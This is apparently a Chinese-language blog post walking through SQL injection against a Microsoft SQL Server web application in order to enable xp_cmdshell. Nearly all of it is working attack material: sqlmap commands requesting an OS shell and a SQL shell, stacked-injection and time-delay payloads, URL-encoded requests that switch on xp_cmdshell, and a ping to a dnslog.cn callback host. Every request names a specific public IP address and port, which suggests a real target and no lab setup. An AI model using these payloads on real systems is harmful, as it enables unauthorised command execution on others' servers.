sql 注入xpcmdshell相关问题

Gryffinbit

发布于：2023年10月19日

sql注入

select * from master.dbo.sysobjects where xtype=’x’ and name=’xp_cmdshell’
select count(*) from master.dbo.sysobjects where xtype=’x’ and name=’xp_cmdshell’ // 存在返回1

 python .\sqlmap.py -r .\point.txt --proxy sock5://127.0.0.1:7890

ponit.txt 的内容

id=666666 是注入点的位置，* 代表优先从这里开始

GET /linksframe/linkadd.jsp?id=666666* HTTP/1.1
Host: 1.196.238.71:93
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close

SQLmap的过程，可以看到数据库是什么，比如是Microsoft SQl Server （也就是mssql）

 python .\sqlmap.py -r .\point.txt --proxy socks5://127.0.0.1:7890 --os-shell

通过这个语句，看看有没有shell可以捡

python .\sqlmap.py -r .\point.txt --proxy socks5://127.0.0.1:7890 --sql-shell

通过这个语句，可以拿到sqlshell，执行sql语句。

 http://1.196.238.71:93/linksframe/linkadd.jsp?id=666666';WAITFOR DELAY '0:0:5'--

GET /linksframe/linkadd.jsp?id=666666' union all select 9af,null,sys.fn_sqlvarbasetostr(HashBytes('MD5','GRYFF')),null,null,'33';WAITFOR DELAY '0:0:4 HTTP/1.1

通过这种方式，看能否堆叠注入。

在sqlshell 里面查看是否开启xpcmdshell

select * from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' // 存在返回1

之所以要堆叠注入的原因，是因为需要开启xpcmdshell，他需要先开启，然后再保存配置。

' union all select 9af,null,sys.fn_sqlvarbasetostr(HashBytes('MD5','GRYFF')),null,null,null;
exec sp_configure 'show advanced options', 1;
reconfigure;
exec sp_configure 'xp_cmdshell',1;
reconfigure;
exec master..xp_cmdshell 'ping 6byyxc.dnslog.cn

sys.fn_sqlvarbasetostr 的作用是能让md5回显。

结尾需要注释

    GET /linksframe/linkadd.jsp?id=666666'%20union%20all%20select%209af%2cnull%2csys.fn_sqlvarbasetostr(HashBytes('MD5'%2c'GRYFF'))%2cnull%2cnull%2cnull%3bexec%20sp_configure%20'show%20advanced%20options'%2c%201%3breconfigure%3bEXEC%20sp_configure%20'xp_cmdshell'%2c1%3bRECONFIGURE%3b%20--%20 HTTP/1.1
Host: 1.196.238.71:93
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
    Accept-Encoding: gzip, deflate
Connection: close

    GET /linksframe/linkadd.jsp?id=666666'%20union%20all%20select%20null%2cnull%2cnull%2cnull%2cnull%2cnull%3bEXEC%20sp_configure%20'show%20advanced%20options'%2c1%3bRECONFIGURE%3bEXEC%20sp_configure%20'xp_cmdshell'%2c1%3bRECONFIGURE%3b%20-- HTTP/1.1
Host: 1.196.238.71:93
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
    Accept-Encoding: gzip, deflate
Connection: close

    GET /linksframe/linkadd.jsp?id=666666'%20union%20all%20select%20null%2cnull%2cnull%2cnull%2cnull%2cnull%3bCREATE%20TABLE%20cmdtmp%20(dir%20varchar(8000))%3b--%20 HTTP/1.1
Host: 1.196.238.71:93
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
    Accept-Encoding: gzip, deflate
Connection: close